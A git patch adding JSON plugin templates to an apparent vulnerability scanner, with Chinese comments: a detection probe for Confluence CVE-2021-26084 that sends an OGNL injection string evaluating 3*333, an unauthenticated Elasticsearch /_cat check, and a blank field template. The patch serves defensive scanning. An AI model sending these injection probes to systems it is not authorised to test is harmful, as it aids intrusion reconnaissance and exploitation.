From 1d4fdbb3df92e8d7613ba55963a4cedc27f7ae9a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E8=B4=B0=E6=8B=BE=E5=A3=B9?=
 <30471543+er10yi@users.noreply.github.com>
Date: Wed, 8 Sep 2021 17:43:10 +0800
Subject: [PATCH] =?UTF-8?q?2.2=E9=A2=84=E8=A7=88=E7=89=883=E6=96=B0?=
 =?UTF-8?q?=E6=A8=A1=E6=9D=BF?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../Confluence RCE(CVE-2021-26084).json"      | 15 ++++++++
 .../ElasticsearchUnauth.json"                 | 15 ++++++++
 .../demo.json"                                | 35 +++++++++++++++++++
 3 files changed, 65 insertions(+)
 create mode 100644 "\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/Confluence RCE(CVE-2021-26084).json"
 create mode 100644 "\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/ElasticsearchUnauth.json"
 create mode 100644 "\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/demo.json"

diff --git "a/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/Confluence RCE(CVE-2021-26084).json" "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/Confluence RCE(CVE-2021-26084).json"
new file mode 100644
index 0000000..3f818ff
--- /dev/null
+++ "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/Confluence RCE(CVE-2021-26084).json"	
@@ -0,0 +1,15 @@
+// 这里是注释，// 开头的那行会被忽略
+// 行尾也可以用 //注释
+{
+    "name": "Confluence RCE(CVE-2021-26084)", //插件名称
+    "risk": "严重", //风险级别
+    "method": "post", //请求方法
+    "url": "/pages/doenterpagevariables.action", //请求url
+    "header": null, //使用[扫描配置-爬虫ua]中的头
+    "body": "queryString=randompppppp\u0027%2b#{3*333}%2b\u0027bbb", // 常规参数
+    "port": null, //没有指定端口
+    "service": "http", //服务
+    "version": null, //没有指定版本
+    "keyword": "randompppppp", //漏洞关键词
+    "vulname": "默认" //对应漏洞wiki中的漏洞
+}
\ No newline at end of file
diff --git "a/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/ElasticsearchUnauth.json" "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/ElasticsearchUnauth.json"
new file mode 100644
index 0000000..7407426
--- /dev/null
+++ "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/ElasticsearchUnauth.json"	
@@ -0,0 +1,15 @@
+// 这里是注释，// 开头的那行会被忽略
+// 行尾也可以用 //注释
+{
+    "name": "ElasticsearchUnauth", //插件名称
+    "risk": "高危", //风险级别
+    "method": "get", //请求方法
+    "url": "/_cat", //请求url
+    "header": null, //使用[扫描配置-爬虫ua]中的头
+    "body": null, // 没有参数
+    "port": "9200", //端口
+    "service": "Elasticsearch", //服务
+    "version": null, //没有指定版本
+    "keyword": "/_cat/allocation,/_cat/count", //漏洞关键词
+    "vulname": "默认" //对应漏洞wiki中的漏洞
+}
\ No newline at end of file
diff --git "a/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/demo.json" "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/demo.json"
new file mode 100644
index 0000000..8fc760d
--- /dev/null
+++ "b/\346\211\271\351\207\217\345\257\274\345\205\245\346\225\260\346\215\256/2.4 web\346\217\222\344\273\266/demo.json"	
@@ -0,0 +1,35 @@
+// 这里是注释，// 开头的那行会被忽略
+// 单个json格式的web插件
+// 行尾也可以用 //注释
+{
+    //插件名称，不能为空
+    "name": null,
+    //风险级别：信息, 低危, 中危, 高危, 严重, 致命，不能为空
+    "risk": null,
+    //请求方法：不能为空，可以是get、post、put、delete、patch、head、options、trace
+    "method": null,
+    //请求url，不能为空，以/开头，不需要完整的url，完整的url由系统根据端口、服务、版本获取ip端口后，与协议、方法及当前填写的url拼接而成    get带参数写在url里
+    "url": null,
+    //请求头，json格式，如果不指定User-Agent头的值，则会从 [扫描配置-爬虫ua] 中随机一个头
+    "header": null,
+    //请求体，可以是json格式，或者常规参数格式
+    // 1.没有参数
+    "body": null,
+    // 2.json格式参数
+    // "body": {
+    //     "username": "test",
+    //     "password": "passwd"
+    // },
+    // 3.常规参数
+    // "body": "id=1&user=test"
+    //插件对应的端口，可以多个value，英文,逗号分割，资产/目标端口与此相同，才会调用该插件
+    "port": null,
+    //插件对应端口的服务，可以多个value，英文,逗号分割，资产/目标端口的服务包含此服务，则调用该插件
+    "service": null,
+    //插件对应端口服务的版本，可以多个value，英文,逗号分割，资产/目标端口的版本包含此版本，则调用该插件
+    "version": null,
+    //结果中包含该关键词，则存在漏洞；结果包含header和response，可以多个value，英文,逗号分割
+    "keyword": null,
+    //插件对应漏洞wiki中的漏洞，没有则填默认，单个漏洞
+    "vulname": "默认"
+}
\ No newline at end of file